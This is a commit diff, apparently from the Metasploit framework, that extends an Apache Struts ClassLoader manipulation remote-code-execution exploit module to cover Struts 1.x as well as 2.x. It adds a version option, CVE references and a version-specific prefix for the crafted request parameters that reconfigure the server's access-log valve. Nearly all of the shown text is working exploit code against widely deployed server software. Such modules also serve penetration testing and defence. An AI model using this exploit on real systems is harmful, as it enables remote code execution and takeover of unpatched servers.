Land #4683, @julianvilas's support for struts 1 on struts_code_exec_classloader
commit
3471b43010
|
@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows
|
||||
access to 'class' parameter that is directly mapped to getClass() method and
|
||||
allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary
|
||||
Java code via crafted parameters.
|
||||
This module exploits a remote command execution vulnerability in Apache Struts versions
|
||||
1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
|
||||
the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
|
||||
to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
|
||||
mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
|
||||
allow remote attackers to execute arbitrary Java code via crafted parameters.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -33,8 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2014-0094'],
|
||||
['CVE', '2014-0112'],
|
||||
['CVE', '2014-0114'],
|
||||
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
|
||||
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
|
||||
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
|
||||
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
|
||||
['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
|
||||
],
|
||||
'Platform' => %w{ linux win },
|
||||
'Payload' =>
|
||||
|
@ -69,7 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
|
||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -101,15 +106,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def modify_class_loader(opts)
|
||||
|
||||
cl_prefix =
|
||||
case datastore['STRUTS_VERSION']
|
||||
when '1.x' then "class.classLoader"
|
||||
when '2.x' then "class['classLoader']"
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
|
||||
}
|
||||
})
|
||||
|
||||
|
|
Loading…
Reference in New Issue